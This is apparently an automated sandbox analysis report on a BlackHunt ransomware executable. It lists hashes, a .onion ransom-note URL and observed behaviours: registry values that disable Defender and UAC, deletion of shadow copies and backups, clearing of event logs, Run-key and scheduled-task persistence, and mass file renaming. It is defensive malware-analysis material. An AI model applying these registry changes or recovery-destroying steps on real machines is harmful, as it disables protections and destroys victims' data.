Analysis
-
max time kernel
21s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 00:22
Static task
static1
Behavioral task
behavioral1
Sample
a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe
Resource
win10v2004-20231222-en
General
-
Target
a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe
-
Size
707KB
-
MD5
44a4ffdfb52b7daa23e1225bb69872fa
-
SHA1
1332f118e58d702fca6c5751f4b4a74186f936b6
-
SHA256
a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b
-
SHA512
50f473e7b116ede3f44da5603b7322fe07b0d06347b1014b8dc66fb9bd1a512ffe1ee9bc3a6abed6aa623a14b1722fc6306cfbf487095afdaca407918d005ab4
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1o8Rvnh:6uaTmkZJ+naie5OTamgEoKxLWDFh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5856 fsutil.exe 19344 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 8244 wevtutil.exe 18528 wevtutil.exe 18604 wevtutil.exe 18640 wevtutil.exe 18720 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 6656 bcdedit.exe 6252 bcdedit.exe 19108 bcdedit.exe 18756 bcdedit.exe -
Renames multiple (2113) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 7504 wbadmin.exe 19032 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\G: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\N: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\I: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\S: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\X: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\Y: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\P: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\K: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\Z: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\B: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\U: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\O: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\J: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\R: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\H: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\V: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\W: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\L: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\M: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\Q: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened (read-only) \??\A: a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\ms.txt a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_folder-hover_32.svg a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-ma\#BlackHunt_Private.key a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\#BlackHunt_Private.key a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-ae\#BlackHunt_ReadMe.txt a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\#BlackHunt_ReadMe.txt a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files-select\css\#BlackHunt_ReadMe.txt a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\classfile_constants.h a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\duplicate.svg a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\#BlackHunt_ReadMe.txt a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\#BlackHunt_Private.key a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\Toast.svg a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ar-ae\#BlackHunt_ReadMe.hta a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\#BlackHunt_ReadMe.txt a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\#BlackHunt_ReadMe.txt a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\#BlackHunt_ReadMe.txt a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\css\#BlackHunt_ReadMe.hta a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\ui-strings.js a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ru-ru\#BlackHunt_Private.key a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_out\#BlackHunt_ReadMe.hta a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Exp_RHP.aapp a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fi-fi\#BlackHunt_ReadMe.txt a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\fonts\#BlackHunt_Private.key a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\#BlackHunt_ReadMe.txt a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\fi-fi\#BlackHunt_Private.key a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\#BlackHunt_ReadMe.txt a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files\VideoLAN\VLC\locale\de\#BlackHunt_ReadMe.hta a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\vlc.mo a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\rhp_world_icon_hover_2x.png a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons_retina.png a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\es-es\#BlackHunt_ReadMe.hta a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-il\#BlackHunt_ReadMe.txt a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jmc.txt a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\#BlackHunt_ReadMe.hta a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#BlackHunt_ReadMe.txt a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\#BlackHunt_ReadMe.hta a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_nothumbnail_34.svg a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hu-hu\#BlackHunt_ReadMe.hta a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\#BlackHunt_ReadMe.hta a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\#BlackHunt_ReadMe.hta a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\#BlackHunt_ReadMe.txt a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\files\dev\cef\#BlackHunt_ReadMe.hta a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\#BlackHunt_ReadMe.hta a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fi-fi\#BlackHunt_ReadMe.hta a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files\VideoLAN\VLC\locale\et\#BlackHunt_ReadMe.txt a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\vlc.mo a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\#BlackHunt_ReadMe.hta a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\js\#BlackHunt_Private.key a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\#BlackHunt_ReadMe.hta a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\#BlackHunt_Private.key a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-ma\ui-strings.js a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fi-fi\#BlackHunt_ReadMe.txt a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\it-it\#BlackHunt_ReadMe.hta a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-gb\#BlackHunt_Private.key a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Stamp.aapp a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\relaxngom.md a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int.gif a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\es-es\#BlackHunt_ReadMe.hta a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\#BlackHunt_ReadMe.txt a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\joni.md a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2736 14276 WerFault.exe 297 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5704 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 7780 vssadmin.exe 18660 vssadmin.exe 4284 vssadmin.exe 6324 vssadmin.exe 7360 vssadmin.exe 7804 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 11360 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 18924 PING.EXE -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe Token: SeRestorePrivilege 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe Token: SeBackupPrivilege 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe Token: SeTakeOwnershipPrivilege 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe Token: SeAuditPrivilege 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe Token: SeSecurityPrivilege 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe Token: SeIncBasePriorityPrivilege 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe Token: SeBackupPrivilege 6776 vssvc.exe Token: SeRestorePrivilege 6776 vssvc.exe Token: SeAuditPrivilege 6776 vssvc.exe Token: SeBackupPrivilege 7420 wbengine.exe Token: SeRestorePrivilege 7420 wbengine.exe Token: SeSecurityPrivilege 7420 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3800 wrote to memory of 1340 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 93 PID 3800 wrote to memory of 1340 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 93 PID 3800 wrote to memory of 1424 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 95 PID 3800 wrote to memory of 1424 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 95 PID 3800 wrote to memory of 4088 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 97 PID 3800 wrote to memory of 4088 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 97 PID 3800 wrote to memory of 4852 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 99 PID 3800 wrote to memory of 4852 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 99 PID 3800 wrote to memory of 4664 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 101 PID 3800 wrote to memory of 4664 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 101 PID 3800 wrote to memory of 3076 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 104 PID 3800 wrote to memory of 3076 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 104 PID 3800 wrote to memory of 4888 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 103 PID 3800 wrote to memory of 4888 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 103 PID 3800 wrote to memory of 2260 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 167 PID 3800 wrote to memory of 2260 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 167 PID 1340 wrote to memory of 872 1340 cmd.exe 109 PID 1340 wrote to memory of 872 1340 cmd.exe 109 PID 3800 wrote to memory of 4976 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 110 PID 3800 wrote to memory of 4976 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 110 PID 3800 wrote to memory of 2236 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 186 PID 3800 wrote to memory of 2236 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 186 PID 3800 wrote to memory of 3100 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 113 PID 3800 wrote to memory of 3100 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 113 PID 3800 wrote to memory of 544 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 114 PID 3800 wrote to memory of 544 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 114 PID 4088 wrote to memory of 1200 4088 cmd.exe 118 PID 4088 wrote to memory of 1200 4088 cmd.exe 118 PID 3800 wrote to memory of 2812 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 120 PID 3800 wrote to memory of 2812 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 120 PID 1424 wrote to memory of 2736 1424 cmd.exe 154 PID 1424 wrote to memory of 2736 1424 cmd.exe 154 PID 3800 wrote to memory of 1036 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 122 PID 3800 wrote to memory of 1036 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 122 PID 4664 wrote to memory of 4276 4664 cmd.exe 124 PID 4664 wrote to memory of 4276 4664 cmd.exe 124 PID 4852 wrote to memory of 716 4852 cmd.exe 125 PID 4852 wrote to memory of 716 4852 cmd.exe 125 PID 2260 wrote to memory of 3236 2260 Conhost.exe 180 PID 2260 wrote to memory of 3236 2260 Conhost.exe 180 PID 4888 wrote to memory of 2884 4888 cmd.exe 127 PID 4888 wrote to memory of 2884 4888 cmd.exe 127 PID 4976 wrote to memory of 3008 4976 cmd.exe 128 PID 4976 wrote to memory of 3008 4976 cmd.exe 128 PID 3800 wrote to memory of 1484 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 129 PID 3800 wrote to memory of 1484 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 129 PID 3800 wrote to memory of 1700 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 131 PID 3800 wrote to memory of 1700 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 131 PID 3800 wrote to memory of 4660 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 133 PID 3800 wrote to memory of 4660 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 133 PID 3800 wrote to memory of 3456 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 134 PID 3800 wrote to memory of 3456 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 134 PID 2236 wrote to memory of 2076 2236 Conhost.exe 138 PID 2236 wrote to memory of 2076 2236 Conhost.exe 138 PID 3100 wrote to memory of 3316 3100 cmd.exe 137 PID 3100 wrote to memory of 3316 3100 cmd.exe 137 PID 3076 wrote to memory of 4020 3076 cmd.exe 173 PID 3076 wrote to memory of 4020 3076 cmd.exe 173 PID 3800 wrote to memory of 4464 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 141 PID 3800 wrote to memory of 4464 3800 